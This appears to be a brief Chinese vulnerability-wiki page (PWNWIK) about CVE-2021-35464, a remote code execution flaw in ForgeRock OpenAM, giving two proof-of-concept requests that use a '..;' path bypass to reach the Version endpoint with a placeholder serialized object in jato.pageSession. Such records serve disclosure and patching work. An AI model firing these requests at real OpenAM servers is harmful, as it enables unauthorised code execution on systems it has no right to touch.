Loading
0

CVE-2021-35464 ForgeRock OpenAM RCE漏洞

PWNWIK.COM

,

POC1

GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object>

POC2

curl -v "http://127.0.0.1:7080/openam/oauth2/..;/ccversion/Version" -d jato.pageSession=<serialized_object>

免费、自由、人人可编辑的漏洞库